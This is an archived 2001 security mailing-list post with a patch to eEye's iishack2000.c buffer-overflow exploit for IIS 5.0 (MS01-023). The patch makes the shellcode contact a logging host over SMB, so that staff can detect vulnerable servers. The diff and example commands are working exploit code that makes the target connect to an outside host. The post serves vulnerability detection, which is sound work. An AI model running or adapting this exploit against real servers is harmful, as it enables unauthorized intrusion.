> ... , will create a file called www.eEye.com.txt on the root of >drive c. > ... This proof of concept exploit is not to be used as a >method of testing to see if your vulnerable or not. In some environments, security staff may be responsible for identifying which IIS 5.0 servers, out of a large collection of them, still do not have a fix in place for this vulnerability. The security staff may not have any convenient way to check for the existence of c:\www.eEye.com.txt on every server, and thus a proof-of-concept exploit that provides a result observable over the network may be of interest. One possibility, which involves only minor changes to the code provided by eEye Digital Security, is to try to get the IIS 5.0 system to access a UNC share on a system controlled by the security staff. I've appended a patch to iishack2000.c that implements this. To use this, first obtain the original iishack2000.c from http://www.eeye.com/html/research/Advisories/iishack2000.c The MD5 checksum of this is 1e8f76209ee0afaa7b6625a8ace48535. Then, remove the control-M characters, e.g., tr -d '\015' < iishack2000.c > iishack2000.c.tr; mv iishack2000.c.tr iishack2000.c The MD5 checksum should then be c93b4d9040723fb03c6860a023f6df2b, and the patch below can then be applied. Example: the security staff operate a machine 10.0.0.1 that has some way of logging any packets sent to it on tcp ports 139 and 445 (ipchains, IP Filter, etc.), and which normally sees no traffic on those ports. The machine 10.0.0.2 is one of a large number of IIS 5.0 servers that might still have the MS01-023 vulnerability. The setup of 10.0.0.2 allows it to send SMB requests to 10.0.0.1, even though it normally would not do so. The security staff run this program, e.g., % iishack2000 10.0.0.2 80 0 10.0.0.1 % iishack2000 10.0.0.2 80 1 10.0.0.1 and then look at the packet log files. If there are packets from 10.0.0.2 to 10.0.0.1 on tcp ports 139 or 445, then 10.0.0.2 is almost certainly vulnerable. Otherwise, no evidence of a vulnerability has been found. Presumably more efficient methods will become available later, but this one may be of interest since many organizations need to check their IIS 5.0 servers now. (Incidentally, I've tried the webexplt.pl recently posted by Wanderley J. Abreu Jr., and for me it reports "The Machine tested has the IPP Vulnerability!" on machines that have Microsoft's Q296576 patch.) Matt Power BindView Corporation, RAZOR Team mhpowerat_private *** iishack2000.c.old Wed May 2 23:58:17 2001 --- iishack2000.c Wed May 2 23:58:17 2001 *************** *** 86,89 **** { ! char request_message[500]; ! int X,sock,sp=0; unsigned short serverport=htons(80); --- 86,89 ---- { ! char ip[16],request_message[500],unc[20]; ! int X,i,len,sock,sp=0; unsigned short serverport=htons(80); *************** *** 101,103 **** printf("Exploit by Ryan Permeh <ryanat_private>\n"); ! if(argc < 4) usage(); if(argv[1] != NULL) --- 101,103 ---- printf("Exploit by Ryan Permeh <ryanat_private>\n"); ! if(argc < 5) usage(); if(argv[1] != NULL) *************** *** 116,118 **** } ! printf("Sending string to overflow sp %d for host: %s on port:%d\n",sp,inet_ntoa(attack),htons(serverport)); memset(request_message,0x00,500); --- 116,142 ---- } ! if(argv[4] != NULL && strlen(argv[4]) <= 15) ! { ! strcpy(ip, argv[4]); ! strcpy(&unc[2], argv[4]); ! len = strlen(argv[4]); ! } ! else ! { ! strcpy(ip, "127.0.0.1"); ! strcpy(&unc[2], "127.0.0.1"); ! len = strlen("127.0.0.1"); ! } ! unc[0] = '\\'; ! unc[1] = '\\'; ! unc[len + 2] = '\\'; ! for (i = 0; i < 16 - len; ++i) ! { ! unc[len + 3 + i] = 'A'; ! } ! unc[19] = '\0'; ! for (i = 146; i <= 164; ++i) ! { ! sc[sp][i] = unc[i - 146] ^ 3; ! } ! printf("Sending string to overflow sp %d for host: %s on port:%d and contact %s\n",sp,inet_ntoa(attack),htons(serverport),ip); memset(request_message,0x00,500); *************** *** 128,131 **** send(sock,request_message,strlen(request_message)*sizeof(char),0); ! printf("Sent overflow, now look on the c: drive of %s for www.eEye.com.txt\n",inet_ntoa(attack)); ! printf("If the file doesn't exist, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0); } --- 152,155 ---- send(sock,request_message,strlen(request_message)*sizeof(char),0); ! printf("Sent overflow, now look at logs on %s for SMB packets from %s\n",ip,inet_ntoa(attack)); ! printf("If no packets were logged, the server may be patched,\nor may be a different service pack (try again with %d as the service pack)\n",sp==0?1:0); } *************** *** 144,148 **** { ! printf("Syntax: iishack2000 <hostname> <server port> <service pack>\n"); ! printf("Example: iishack2000 127.0.0.1 80 0\n"); ! printf("Example: iishack2000 127.0.0.1 80 1\n"); exit(1); --- 168,172 ---- { ! printf("Syntax: iishack2000 <hostname> <server port> <service pack> <log host>\n"); ! printf("Example: iishack2000 127.0.0.1 80 0 10.0.0.1\n"); ! printf("Example: iishack2000 127.0.0.1 80 1 10.0.0.1\n"); exit(1);
This archive was generated by hypermail 2b30 : Wed May 02 2001 - 22:56:55 PDT